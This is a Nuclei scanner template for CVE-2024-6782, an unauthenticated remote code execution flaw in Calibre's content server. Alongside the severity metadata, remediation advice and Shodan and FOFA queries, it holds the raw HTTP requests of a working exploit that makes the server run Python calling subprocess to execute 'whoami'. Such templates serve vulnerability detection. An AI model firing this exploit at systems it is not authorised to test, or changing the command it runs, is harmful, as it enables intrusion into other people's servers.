id: CVE-2024-6782 info: name: Calibre <= 7.14.0 Remote Code Execution author: DhiyaneshDK severity: critical description: | Unauthenticated remote code execution via Calibre’s content server in Calibre <= 7.14.0. impact: | Unauthenticated attackers can execute arbitrary Python code through the content server's template functionality, achieving complete system compromise. remediation: | Update Calibre to version 7.15.0 or later to address the remote code execution vulnerability. reference: - https://starlabs.sg/advisories/24/24-6781/ classification: cve-id: CVE-2024-6782 cwe-id: CWE-863 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 epss-score: 0.83206 epss-percentile: 0.99638 cpe: cpe:2.3:a:calibre-ebook:calibre:*:*:*:*:*:*:*:* metadata: verified: true vendor: calibre-ebook product: calibre shodan-query: html:"Calibre" fofa-query: "Server: calibre" max-request: 2 tags: cve,cve2024,calibre,rce,vuln,vkev http: - raw: - | GET /interface-data/books-init HTTP/1.1 Host: {{Hostname}} Referer: {{RootURL}} extractors: - type: json name: book_ids internal: true json: - '.search_result.book_ids[0]' - raw: - | POST /cdb/cmd/list HTTP/1.1 Host: {{Hostname}} Content-Type: application/json [ ["template"], "", "", "", {{book_ids}}, "python:def evaluate(a, b):\n import subprocess\n try:\n return subprocess.check_output(['cmd.exe', '/c', 'whoami'])\n except Exception:\n return subprocess.check_output(['sh', '-c', 'whoami'])\n" ] matchers-condition: and matchers: - type: regex part: body regex: - "b'([^']+)" - type: word part: content_type words: - "application/json" - type: status status: - 200 # digest: 4a0a00473045022100c478e6631df8093642a219e0510cc69613d3cc598dcfbcb39691f742386d21df02200ef1775b4d68cf5b4655d09c1f28e0b4786998919ad19b016c6811abff074908:922c64590222798bb761d5b6d8e72950